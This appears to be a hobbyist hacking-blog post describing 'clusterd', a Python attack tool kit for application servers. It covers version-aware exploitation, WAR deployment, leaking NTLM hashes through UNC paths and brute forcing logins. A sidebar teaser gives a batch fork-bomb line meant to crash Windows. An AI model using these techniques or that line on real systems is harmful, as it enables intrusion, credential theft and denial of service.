Friday, February 21, 2014

Clustered

Clustered is a server attack tool kit which is written in python, Clustered is capable of version-aware exploitation and is also able to reconnaissance using robust and reliable techniques.

clusterd pentest 2

Requirements
·        The only framework aware of a platform’s versionclusterd’s core is built around recon and exploitation of platforms based upon the discovered version. This version then can be used to deploy payloads or execute auxiliary modules. JBoss, for example, was particularly difficult to deploy to because it was never clear which deployment method worked with which version. clusterd has exhaustively been tested against many minor/major versions of JBoss, ensuring stability and dependability with version-specific deployments.
·        JBoss 7.x deploymentsCurrently, no other tool is capable of deploying WAR’s to JBoss 7.x and up. This is because gone are the days of jmx-console’s and exposed JMXInvokerServlets. 7.x uses a new HTTP API using JSON messaging. Deploying to this is still possible, and admittedly easier and more stable than before, but this interface will always require authentication. No default credentials are enabled.
·        SMB hash retrievalclusterd features a unique methodology for forcing remote application servers to emit their encrypted NTLM hash. This is performed by submitting an installation of a WAR containing a UNC path, which the server will then attempt to retrieve. Because of the way in which Windows connects to remote shares/UNC paths, it will automatically attempt to negotiate an SMB connection, divulging its encrypted NTLM hash. We use the standard nonce, 1122334455667788, to ease cracking of the hash.
·        Password brute forcingMany services, such as WebLogic, don’t use basic HTTP auth, thereby eliminating the use of HTTP authentication brute forcers, such as Hydra or Medusa. clusterd is fully capable of brute forcing authentication for all supported platforms using a provided wordlist and username. Also included are many default credentials for these platforms, so clusterd may even be able to guess credentials without you even knowing.
Requirements
·        Python >= 2.7.x
·        Requests >= 2.2.x
Installation
The recommended installation of clusterd is to clone the Github repository
git clone https://github.com/hatRiot/clusterd.git
Please like subscribe and follow I would appreciate it.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...

  • Smartd0rk3r
    Smartd0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors. It is based on...
  • 100th Post
    So I have written 100 posts in under two months I think that this is a big achievment please follow and like this post so I can continue to...
  • Hacking with Kali linux ( Pdf download)
    Kali Linux although it sounds like slang for California,  Kali through the phases of the penetration testing life cycle; one major tool fr...